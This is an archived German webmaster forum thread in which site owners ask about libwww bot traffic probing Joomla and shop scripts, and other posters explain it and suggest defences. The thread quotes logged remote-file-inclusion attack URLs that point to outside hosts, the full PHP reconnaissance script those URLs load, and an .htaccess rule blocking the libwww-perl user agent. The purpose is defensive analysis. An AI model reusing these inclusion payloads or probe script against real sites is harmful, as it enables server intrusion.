ABAKUS

Ihr Partner in Sachen SEO und Online Marketing
https://archiv.abakus-internet-marketing.de/foren/

LibWWW

https://archiv.abakus-internet-marketing.de/foren/viewtopic.php?f=52&t=32381

Seite 1 von 1

LibWWW

Verfasst: 25.09.2006, 16:10
von 1aaaa
Hi!

Ich habe heute auf einer Seite, auf der sich üblicherweise erst 3 oder 4 Besucher am Tag tummeln ca. 50 gehabt. Unterschiedliche Länder, unterschiedliche IPs. Einzige Gemeinsamkeit ist der Browser - "LibWWW" steht da. Übrigens, die Seite ist mit Joomla gemacht und ich habe die Zoom Gallery.

Es wurden immer Seiten wie
...component/option,com_zoom/Itemid,26/components/com_zoom/classes/fs_unix.php/
...component/option,com_zoom/Itemid,26/components/com_zoom/classes/fs_win32.php/
...component/option,com_zoom/Itemid,26/components/com_zoom/classes/fs_win32.php/
aufgerufen.

Was ist da im Busch? kann da jemand was mit anfangen? Übrigens gibt es die Seiten so nicht, man kommt so immer auf die Galerieübersicht, deren URL ich aber mit OpenSEF auf.../Galerie umgebaut habe.

Schönen Gruss.

Verfasst:
von

Verfasst: 25.09.2006, 18:44
von net(t)worker
libWWW ist ein perl modul.... ich würde sagen da sucht ein script über proxys nach einer bestimmten schwachstelle....

Verfasst: 26.09.2006, 00:45
von 1aaaa
......... hmmmm.

ich glaub ich meld mich mal im joomlaforum an und frag da nach. hatte die tage auch schon 2 "useranmeldungen", obwohl das entsprechende modul gar nicht veröffentlicht war.


danke dir.

Verfasst: 10.11.2008, 11:03
von Viktor1982
Hallo ,

bei mir seid zwei Tagen das gleiche Problem , anscheinend sucht jemand eine Schwachstelle bei mir im Shop :bad-words:
Oder sehr wahrscheinlich nach dem Passwort.

Hat folgendes bei mir aufgerufen:

Hostname www.sitelift.de

//modules/mods_full/shopping_cart/includes/errors.php?error=https://fantalaranja.t35.com/idr0x.txt???

mit libWWW und die seite hat folgenden Inhalt:

<?php
function ConvertBytes($number)
{
$len = strlen($number);
if($len < 4)
{
return sprintf("%d b", $number);
}
if($len >= 4 && $len <=6)
{
return sprintf("%0.2f Kb", $number/1024);
}
if($len >= 7 && $len <=9)
{
return sprintf("%0.2f Mb", $number/1024/1024);
}

return sprintf("%0.2f Gb", $number/1024/1024/1024);

}

echo "narasaon<br>";
$un = @php_uname();
$up = system(uptime);
$id1 = system(id);
$pwd1 = @getcwd();
$sof1 = getenv("SERVER_SOFTWARE");
$php1 = phpversion();
$name1 = $_SERVER['SERVER_NAME'];
$ip1 = gethostbyname($SERVER_ADDR);
$free1= diskfreespace($pwd1);
$free = ConvertBytes(diskfreespace($pwd1));
if (!$free) {$free = 0;}
$all1= disk_total_space($pwd1);
$all = ConvertBytes(disk_total_space($pwd1));
if (!$all) {$all = 0;}
$used = ConvertBytes($all1-$free1);
$os = @PHP_OS;


echo "narasaon was here ..<br>";
echo "uname -a: $un<br>";
echo "os: $os<br>";
echo "uptime: $up<br>";
echo "id: $id1<br>";
echo "pwd: $pwd1<br>";
echo "php: $php1<br>";
echo "software: $sof1<br>";
echo "server-name: $name1<br>";
echo "server-ip: $ip1<br>";
echo "free: $free<br>";
echo "used: $used<br>";
echo "total: $all<br>";
exit;

weiß den jamand was dies bedeutet

gestern das gleiche mit verschiedenen IPS

/?Language=https://www.viponline.com.br/alb.txt%3f

aber hat wohl seine spur verwischt hmmmmmmmmm


wie kann man libWWW komplett sperren in der .htaccess ?

Verfasst: 10.11.2008, 11:39
von Mork vom Ork
Viktor1982 hat geschrieben:anscheinend sucht jemand eine Schwachstelle bei mir im Shop
Das ist nichts Besonderes. Lass' ihn suchen und seine Zeit verschwenden, denn du hast ja sicher immer aktuelle Software.
//modules/mods_full/shopping_cart/includes/errors.php?error=https://fantalaranja.t35.com/idr0x.txt???
Offensichtlich lässt (oder ließ) sich dein Skript errors.php mit dem Parameter error dazu verleiten, von irgendwo auf der Welt ein Skript runterzuladen und auszuführen. Sowas ist natürlich extrem dumm.
echo "narasaon was here ..<br>";
echo "uname -a: $un<br>";
echo "os: $os<br>";
echo "uptime: $up<br>";
echo "id: $id1<br>";
echo "pwd: $pwd1<br>";
echo "php: $php1<br>";
echo "software: $sof1<br>";
echo "server-name: $name1<br>";
echo "server-ip: $ip1<br>";
echo "free: $free<br>";
echo "used: $used<br>";
echo "total: $all<br>";
exit;

weiß den jamand was dies bedeutet
Das Skript spuckt lediglich ein paar erstmal unverfängliche Serverdaten aus: Betriebssystem, IP-Adresse, Plattenspeicher usw. Das Kürzel "pwd" bedeutet übrigens nicht "password", sondern steht für "print work(ing) directory", also das derzeitige Arbeitsverzeichnis.
wie kann man libWWW komplett sperren in der .htaccess ?
Das kannst du, aber dann sperrst du lediglich die Gelangweilten aus, die vor lauter Trübsinn sich nicht einmal dazu aufraffen konnten, libwww eine unverdächtigere Browserkennung übermitteln zu lassen - die sind keine Gefahr, die machen sich lediglich einen kleinen Spaß daraus, schlampige Seitenbetreiber, die aus Bequemlichkeit oder Unwissenheit auf Softwareupdates verzichten, bloßzustellen.

Aussperren kannst du Browser mittels Deny. Wenn du dort in der Anleitung dem Verweis zum Gegenstück Allow folgst, findest du ein fast passendes Beispiel.

Verfasst: 10.11.2008, 11:39
von whyte

Code: Alles auswählen

RewriteEngine On

# block bad bots
RewriteCond %&#123;HTTP_USER_AGENT&#125; ^libwww-perl
RewriteRule ^.* - &#91;F,L&#93;
oder besser gleich mal die komplette Liste:
https://www.server-wissen.de/security/h ... erren.html

Gruß
Marco

Verfasst: 10.11.2008, 11:47
von Viktor1982
Ja ich verwende eigentlich den sicheren Fork ,

Super Antwort und super Forum hat weitergeholfen Vielen Dank ! :lol:

Verfasst: 10.11.2008, 12:49
von Ice Man
jo, den kenn ich.
Wer ein phpbb Forum hat, der wurde von dem schon oft besucht.
Der hat auch immer nach Schachstellen gesucht.
Oft nach den, die durch das neueste Sicherheitsupdate gefixt werden sollten.
Alle Zeiten sind UTC+01:00
Seite 1 von 1

Powered by phpBB® Forum Software © phpBB Limited

Deutsche Übersetzung durch phpBB.de